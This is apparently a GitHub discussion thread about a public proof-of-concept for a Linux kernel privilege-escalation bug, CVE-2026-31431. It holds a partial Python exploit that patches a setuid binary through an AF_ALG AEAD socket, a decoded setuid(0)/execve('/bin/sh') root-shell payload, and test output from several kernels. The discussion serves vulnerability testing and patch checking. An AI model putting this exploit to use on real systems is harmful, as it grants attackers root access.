theori-io/copy-fail-CVE-2026-31431

Confirmed doesn't work on debian 12.13 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64 GNU/Linux

> Here. Fixed that for you. Used ctypes to replicate the splice wrapper https://github.com/slaptat/copyFail30

Thanks, although your heading probably should say "CopyFail for Python versions < 3.10" :)

> https://shell.bzed.at/~bzed/.publish/2026-04-30-2ndwzYIR8WA/test.c - some totally untested c rewrite, needs -lz -lrt

on Oracle Linux 9.2 with kernel 5.15.0-103.114.4.el9uek.x86_64 and gcc-11.5.0-11.0.2.el9.x86_64

```
$ gcc -lz -lrt test.c -o copyfail
$ file copyfail
copyfail: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d9a3ce867ed43ebf1075bf9a0604de3b14311079, for GNU/Linux 3.2.0, not stripped
$ ./copyfail
open /usr/bin/su: Permission denied

````

I renamed variables, added comments and made it easier to read:
```py
#!/usr/bin/env python3
import os as os_module
import socket as socket_module
import zlib


# Convert a hex string to bytes
def hex_to_bytes(hex_string):
return bytes.fromhex(hex_string)


# Patch a 4-byte chunk (patch_bytes) at offset (chunk_offset) in file descriptor (target_fd)
# using a kernel AEAD crypto socket to write into the target binary
def patch_chunk(target_fd, chunk_offset, patch_bytes):
# Create an AEAD (Authenticated Encryption with Associated Data) socket
crypto_socket = socket_module.socket(38, 5, 0)
# Bind to the AEAD algorithm: AES-CBC with HMAC-SHA256 (with ESN)
crypto_socket.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# SOL_ALG socket option level
sol_alg = 279
set_socket_option = crypto_socket.setsockopt
# Set the cipher key (16-byte AES key, all zeros)
set_socket_option(sol_alg, 1, hex_to_bytes("0800010000000010" + "0" * 64))
# Set the authent...

https://www.reddit.com/r/sysadmin/comments/1szajkx/copy_fail_cve202631431_is_a_trivially_exploitable/ formatted it at https://gist.github.com/grenkoca/b82281a4706e936072979acf54b608df . But the names are still one-letter and the `socket.socket` still uses magic numbers not constants.

Although the config references:
CONFIG_CRYPTO_AEAD=y
CONFIG_CRYPTO_AEAD2=y
CONFIG_CRYPTO_USER_API_AEAD=y

I can't find the kernel module itself:
find /hostfs/lib/modules/6* | grep algif_aead

Neither in 6.12.57-talos (v1.11.5), 6.18.9-talos (v1.12.4), 6.18.18-talos (v1.12.6) nor in 6.18.24-talos (v1.12.7).

> Zlib payload seems safe, kind of:
>
> int main() {
> setuid(0);
> execve("/bin/sh", NULL, NULL);
> return 0;
> }

I know, I disassembled it myself. But this is not transparent and not portable to other CPUs.

Zlib payload seems safe, kind of:
```c
int main() {
setuid(0);
execve("/bin/sh", NULL, NULL);
return 0;
}
```

Yes, I’ve just realised why it worked on my test VM – it was a mistake on my end. Sorry for false alarm.

Does not work on latest LTS kernel:

```
cve:/home/user$ ls
copy_fail_exp.py
cve:/home/user$ python3 copy_fail_exp.py
Password:
su: Authentication failure
cve:/home/user$
cve:/home/user$ uname -a
Linux cve 6.18.25-0-virt #1-Alpine SMP PREEMPT_DYNAMIC 2026-04-29 07:18:05 x86_64 Linux
cve:/home/user$
```

Also provide the source for the binary and make it dynamically compile for different architectures.

Can you please test it on the latest 3.23, linux-lts or linux-virt? Some people are unable to reproduce it and I don’t know why.

there is this script: https://raw.githubusercontent.com/rootsecdev/cve_2026_31431/refs/heads/main/test_cve_2026_31431.py that seems to work in testing if the page cache writes work

> This is working for scripts with #!/bin/bash fine.

I think Linux has something builtin that prevents setuid binaries from shebangs like `#!/bin/bash` so that is sadly still not a proof that NixOS isn't affected.

Yes, what @zimward wrote is true. It might be worth noting, that it also doesn't work when you change the path to `/run/wrappers/bin/su` (which is what `which su` prints on NixOS). But this still doen't tell anything about "NixOS is affected" or not. Since it's a kernel bug NixOS might be affected as well as others.